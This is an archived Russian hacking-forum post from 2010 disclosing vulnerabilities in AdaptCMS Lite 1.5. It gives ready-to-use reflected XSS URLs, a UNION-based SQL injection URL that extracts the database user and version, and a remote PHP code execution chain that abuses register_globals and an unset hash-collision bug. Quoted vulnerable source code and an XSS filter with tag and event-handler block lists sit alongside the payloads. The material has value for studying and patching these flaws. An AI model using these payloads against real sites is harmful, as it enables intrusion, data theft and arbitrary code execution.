Форум АНТИЧАТ - Энциклопедия уязвимых скриптов

#11

21.02.2010, 01:56

nikp

Reservists Of Antichat - Level 6

Регистрация: 19.09.2008

Сообщений: 127

Провел на форуме:
835386

Репутация: 1463

AdaptCMS Lite v1.5 - NEW
www.adaptcms.com

pXSS
mq=off
http://localhost/adaptcms_lite_1.5/index.php
post
skin=1>"><script>alert(121212);</script>

http://localhost/adaptcms_lite_1.5/?cat=1'+><script>alert(121212);</script>
http://localhost/adaptcms_lite_1.5/index.php?view=redirect&url=1'+><script>alert(1212 12);</script>
http://localhost/adaptcms_lite_1.5/index.php/>'><script>alert(121212)</script>

-----------------------

index.php

PHP код:


		
			
$_GET['id'] = str_replace("/","",stripslashes(check($_GET['id'])));



$sql = mysql_query("SELECT * FROM ".$pre."pages WHERE url = '".$_GET['id']."'");

functions.php

PHP код:


		
			
function check($val) {

   // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed

   // this prevents some character re-spacing such as <java\0script>

   // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs

   $val = preg_replace('/([\x00-\x08][\x0b-\x0c][\x0e-\x20])/', '', $val);

   

   // straight replacements, the user should never need these since they're normal characters

   // this prevents like <IMG SRC=&#X40&#X61&#X76&#X61&#X73&#X63&#X72&#X69&#X70&#X74&#X3A&#X61&#X6C&#X65&#X72&#X74&#X28&#X27&#X58&#X53&#X53&#X27&#X29>

   $search = 'abcdefghijklmnopqrstuvwxyz';

   $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';

   $search .= '1234567890!@#$%^&*()';

   $search .= '~`";:?+/={}[]-_|\'\\';

   for ($i = 0; $i < strlen($search); $i++) {

      // ;? matches the ;, which is optional

      // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars

   

      // &#x0040 @ search for the hex values

      $val = preg_replace('/(&#[x|X]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;

      // &#00064 @ 0{0,7} matches '0' zero to seven times

      $val = preg_replace('/(&#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;

   }

   

   // now the only remaining whitespace attacks are \t, \n, and \r

   $ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base', 'img');

   $ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');

   $ra = array_merge($ra1, $ra2);

   

   $found = true; // keep replacing as long as the previous round replaced something

   while ($found == true) {

      $val_before = $val;

      for ($i = 0; $i < sizeof($ra); $i++) {

         $pattern = '/';

         for ($j = 0; $j < strlen($ra[$i]); $j++) {

            if ($j > 0) {

               $pattern .= '(';

               $pattern .= '(&#[x|X]0{0,8}([9][a][b]);?)?';

               $pattern .= '|(&#0{0,8}([9][10][13]);?)?';

               $pattern .= ')?';

            }

            $pattern .= $ra[$i][$j];

         }

         $pattern .= '/i';

         $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag

         $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags

         if ($val_before == $val) {

            // no replacements were made, so exit the loop

            $found = false;

         }

      }

   }

   return strip_tags($val, "<p><a><font><b><i><u><span><em><div><li><ul><ol><center><blockquote>");

}

SQL
mq=off
http://localhost/adaptcms_lite_1.5/?view=page&id=-1'+union+select+1,user(),3,version(),5,6+--+

-------------------------------------

index.php

PHP код:


		
			
...

if ($_GET['field'] or $_GET['data']) {

$sql = mysql_query("SELECT * FROM ".$pre."fielddata WHERE".$fddata." ORDER BY `id` DESC".$lim);

} else {

if ($_GET['abc']) {

if ($_GET['cat']) {

$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim);

} else {

$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim);

}

} else {

if ($_GET['cat']) {

$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = ''".$adate." ORDER BY `id` DESC".$lim);

} else {

$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = ''".$adate." ORDER BY `id` DESC".$lim);

}

}

}

while($r = mysql_fetch_array($sql)) {



unset($data, $datas, $pab, $rab, $name1, $link1, $n, $m, $y, $x, $i, $id, $name, $relations_id, $relations_sec, $s, $fetch, $get, $dats, $fname, $lid, $lids, $b, $sqlst, $k, $data23, $check);



...

$pab[0] = "{link}";

$pab[1] = "{date}";

$pab[2] = "{story}";

$pab[3] = "{comments}";

$pab[4] = "{cnum}";

$pab[5] = "{pcomment}";

$pab[6] = "{author}";

$pab[7] = "{section}";

$pab[8] = "{cat}";

$pab[9] = "{url}";

$pab[10] = "{title}";

....

$pab[30] = "{".$r[section]."_name}";

$pab[31] = "{".$r[section]."_username}";

$pab[32] = "{".$r[section]."_id}";

$pab[33] = "{".$r[section]."_views}";

$pab[34] = "{".$r[section]."_votes}";

$pab[35] = "{".$r[section]."_social_icons}";



...



// start - custom fields

$name = "";$data = "";$row = "";

$sql_cf = mysql_query("SELECT * FROM ".$pre."fields WHERE cat = '".$r[section]."' OR cat = 'user-profile'");

while ($row = mysql_fetch_array($sql_cf)) {

$name = "$row[name]";



$data = mysql_fetch_row(mysql_query("SELECT data FROM ".$pre."fielddata WHERE fname = '".$name."' AND aid = '".$r[id]."'"));

$fdata[$name] = $data[0];



if ($data[0]) {

$n = $n + 1;

$pab[$n] = "{".$name."}";

$n = $n + 1;

$pab[$n] = "{".$r[section]."_".$name."}";

$m = $m + 1;

if ($row[type] == "textarea") {

$rab[$m] = parse_text($data[0]);

$m = $m + 1;

$rab[$m] = parse_text($data[0]);

} else {

$rab[$m] = stripslashes(html_entity_decode($data[0]));

$m = $m + 1;

$rab[$m] = stripslashes(html_entity_decode($data[0]));

}

} else {

$n = $n + 1;

$pab[$n] = "{".$name."}";

$n = $n + 1;

$pab[$n] = "{".$r[section]."_".$name."}";

$m = $m + 1;

$rab[$m] = "";

$m = $m + 1;

$rab[$m] = "";

}

}

// end - custom fields



...



eval (" ?>" . str_replace($pab, $rab, stripslashes($temp[0])) . " <?php ");



...

Выбирается шаблон ($temp[0]) и в нем поля (массив $pab) заменяются на конкретное содержание (массив $rab).

Чтобы выполнить свою команду, нужно добавить в массивы по элементу, где
$pab[400] = "{cat}"; ( такое поле есть в шаблоне $temp[0] )
$rab[400] = "php code"; (наша команда или скрипт)

этому препятсвует unset
unset($data, $datas, $pab, $rab, ...);

Приходится использовать unset багу.

сформируем hash_del_key для php5
для pab = 2090607416
для rab = 2090679290

Eval
register_globals = On
версия php, уязвимая для UNSET WHACKING

http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090607416[400]=1&2090679290[400]=1

http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090679290=1

Последний раз редактировалось nikp; 21.02.2010 в 20:48..